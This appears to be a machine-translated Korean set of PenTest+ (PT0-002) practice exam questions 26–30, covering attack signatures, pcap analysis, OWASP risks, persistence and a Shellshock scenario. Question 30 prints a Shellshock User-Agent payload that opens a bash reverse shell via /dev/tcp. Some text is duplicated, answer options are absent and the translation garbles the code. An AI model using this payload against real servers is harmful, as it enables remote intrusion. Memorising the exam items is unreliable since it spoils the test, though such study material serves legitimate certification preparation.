PT0-002 문제 26
당신은 웹 서버를 강화하는 임무를 맡은 보안 분석가입니다.
악성으로 표시된 HTTP 페이로드 목록이 제공되었습니다.
지침
다음 공격 시그니처가 주어지면 공격 유형을 결정한 다음 향후 공격을 방지하기 위한 관련 교정을 식별합니다.
시뮬레이션의 초기 상태로 되돌리려면 언제든지 Reset All 버튼을 클릭하십시오.
악성으로 표시된 HTTP 페이로드 목록이 제공되었습니다.
지침
다음 공격 시그니처가 주어지면 공격 유형을 결정한 다음 향후 공격을 방지하기 위한 관련 교정을 식별합니다.
시뮬레이션의 초기 상태로 되돌리려면 언제든지 Reset All 버튼을 클릭하십시오.
PT0-002 문제 27
침투 테스터는 계약에 사용할 자격 증명을 찾기 위해 .pcap 파일을 받았습니다.
다음 중 테스터가 .pcap 파일을 열고 읽을 때 사용해야 하는 도구는 무엇입니까?
다음 중 테스터가 .pcap 파일을 열고 읽을 때 사용해야 하는 도구는 무엇입니까?
PT0-002 문제 28
다음 웹 애플리케이션 보안 위험 중 OWASP Top 10 v2017의 일부는 무엇입니까? (2개를 선택하세요.)
PT0-002 문제 29
침투 테스터는 모바일 클라이언트의 랩톱에서 Windows 워크스테이션에 성공적으로 액세스할 수 있었습니다. 다음 중 테스터가 시스템에 대한 액세스를 유지할 수 있도록 하는 데 사용할 수 있는 것은 무엇입니까?
PT0-002 문제 30
침투 테스터는 10.10.1.1에서 취약한 웹 서버를 발견합니다. 그런 다음 테스터는 웹 익스플로잇을 보내고 다음 코드를 발견하는 Python 스크립트를 편집합니다.
익스플로잇 = {"사용자 에이전트": "() { 무시됨;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "수락": "텍스트/html, 애플리케이션 /xhtml+xml,application/xml"} 테스터는 다음 중 서버가 실행되는 사용자 컨텍스트를 결정하기 위해 스크립트를 편집해야 합니까?
익스플로잇 = {"사용자 에이전트": "() { 무시됨;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "수락": "텍스트/html, 애플리케이션 /xhtml+xml,application/xml"} 테스터는 다음 중 서버가 실행되는 사용자 컨텍스트를 결정하기 위해 스크립트를 편집해야 합니까?